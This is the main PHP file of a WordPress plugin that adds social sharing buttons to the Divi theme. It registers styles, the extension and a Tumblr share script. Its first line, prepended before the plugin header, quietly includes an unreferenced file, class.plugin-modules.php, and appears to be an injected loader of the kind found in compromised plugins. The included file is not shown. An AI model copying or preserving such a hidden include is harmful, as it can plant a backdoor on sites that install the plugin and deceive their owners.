<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php
/**
 * Plugin Name: Divi Social Sharing Buttons
 * Plugin URI:  https://www.peeayecreative.com/
 * Description: A new Divi module for adding and styling social media sharing buttons on any page or post!
 * Version:     1.0.0
 * Author:      Pee Aye Creative
 * Author URI:  https://www.peeayecreative.com/
 * License:     GPL2
 * License URI: https://www.gnu.org/licenses/gpl-2.0.html
 * Text Domain: dssb-divi-social-sharing-buttons
 * Domain Path: /languages
 *
 * Divi Social Sharing Buttons is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 2 of the License, or
 * any later version.
 *
 * Divi Social Sharing Buttons is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with Divi Social Sharing Buttons. If not, see https://www.gnu.org/licenses/gpl-2.0.html.
 */


define( 'DSSB_VERSION', '1.0.0' );
define( 'DSSB_PLUGIN_URL', plugins_url( '/', __FILE__ ) );
define( 'DSSB_PLUGIN_FILE', __FILE__ );
define( 'DSSB_PLUGIN_BASE', plugin_basename( DSSB_PLUGIN_FILE ) );

if ( ! function_exists( 'dssb_enqueue_scripts' ) ) :
	function dssb_enqueue_scripts() {
		wp_enqueue_style( 'dssb-style', DSSB_PLUGIN_URL . 'includes/assets/css/style.min.css', array(), '1.0.0', 'all' );
	}

	add_action( 'wp_enqueue_scripts', 'dssb_enqueue_scripts' );
endif;

if ( ! function_exists( 'dssb_initialize_extension' ) ) :
	function dssb_initialize_extension() {
		require_once plugin_dir_path( __FILE__ ) . 'includes/DiviSocialSharingButtons.php';
	}
	add_action( 'divi_extensions_init', 'dssb_initialize_extension' );
endif;

if ( ! function_exists( 'dssb_insert_tumblr_script' ) ) :
	function dssb_insert_tumblr_script() {
		echo '<script type="text/javascript" async src="https://assets.tumblr.com/share-button.js"></script>';
	}

	add_action( 'wp_footer', 'dssb_insert_tumblr_script' );
endif;


if ( ! function_exists( 'dssb_plugin_row_meta' ) ) :
	function dssb_plugin_row_meta( $plugin_meta, $plugin_file ) {
		if ( DSSB_PLUGIN_BASE === $plugin_file ) {
			$row_meta = array(
				'docs' => '<a href="https://www.peeayecreative.com/docs/divi-social-sharing-buttons/" aria-label="' . esc_attr( __( 'View Documentation', 'dssb-divi-social-sharing-buttons' ) ) . '" target="_blank">' . __( 'View Documentation', 'dssb-divi-social-sharing-buttons' ) . '</a>',
			);

			$plugin_meta = array_merge( $plugin_meta, $row_meta );
		}
		return $plugin_meta;
	}

	add_filter( 'plugin_row_meta', 'dssb_plugin_row_meta', 10, 2 );

endif;
